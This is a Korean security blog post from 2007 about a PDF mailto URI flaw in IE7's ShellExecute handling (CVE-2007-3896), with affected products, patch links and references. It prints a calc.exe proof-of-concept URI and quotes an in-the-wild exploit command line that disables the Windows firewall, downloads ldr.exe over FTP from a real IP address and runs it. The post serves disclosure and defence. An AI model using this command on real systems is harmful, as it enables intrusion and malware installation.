PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자

서 교환을 위해 자주 사용되는 pdf 파일을 이용한 취약점이 발견되었다.

리는 간단하게 다음과 같다. pdf에서 mailto 태그를 처리하는 루틴에서 %를 사용하여 명령이 escape되는 것 때문입니다.

mailto:test%../../../../windows/system32/calc.exe”.cmd

약한 대상은 다음과 같다.

Windows Server 2003 and Windows XP with Internet Explorer 7 installed

Adobe 제품군 뿐만 아니라 Firefox,Outlook,Outlook Express,Netscape 웹브라우저,Skype까지 이 공격에 취약하다고 한다. 근본적인 문제는 IE7에 있고, ShellExecute 컴포넌트를 이용하는 모든 프로그램이 취약하다고 볼 수 있다.

미국 현지 시간으로 10 23 Full Disclosure에서 돌아 다니는 exploit command line이 공개 되었다. 익스플로잇은 특정 사이트의 ftp 사이트에 접속하여 ldr.exe라는 바이너리를 다운로드 하여 실행 시키는 역할을 한다.

mailt0:%/../../../../../../Windows/system32/cmd”.exe”” /c /q \”@echo

off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo

binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&

start ldr.exe&\” \”&\” “nul.bat”

PS. mailt0 == mailto

제 떠돌고 있는 악성 pdf 파일을 실행한 화면은 다음과 같다.

Pdf 취약점은 간단하게 exploit이 가능하므로 알지 못하는 사람으로 부터 전달된 pdf 파일은 되도록 열지 않는 것이 좋다.

Fixes

음 제품에 대한 업데이트를 설치할 수 있다.

Adobe Reader 8.1.1 update files

http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows

Acrobat 8.1.1 update files

http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows

Adobe 8 버전 이하의 제품에 대한 패치는 현재 제공되지 않고, 어도비 공식 사이트에서는 레지스트리 설정을 변경하는 방법을 권고하고 있다.

내가 만든 패치: 2007/10/29 – [일/취약점 경보] – Adobe pdf 파일 공격에 대한 패치

References

http://spacebunny.xepher.net/hack/shellexecutefiasco/

http://www.heise-security.co.uk/news/97462

http://www.heise-security.co.uk/news/97246

http://www.heise-security.co.uk/news/97139

http://www.heise-security.co.uk/news/97094

http://www.heise-security.co.uk/news/96982

http://www.heise-security.co.uk/news/93470

http://www.microsoft.com/technet/security/advisory/943521.mspx

http://blogs.technet.com/msrc/archive/2007/10/10/msrc-blog-additional-details-and-background-on-security-advisory-943521.aspx

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3896

http://www.securityfocus.com/bid/25748

http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1275885,00.html?track=sy160&asrc=RSS_RSS-10_160

http://seclists.org/fulldisclosure/2007/Oct/0730.html

http://it.slashdot.org/article.pl?sid=07/10/18/1533222&from=rss

Leave a Reply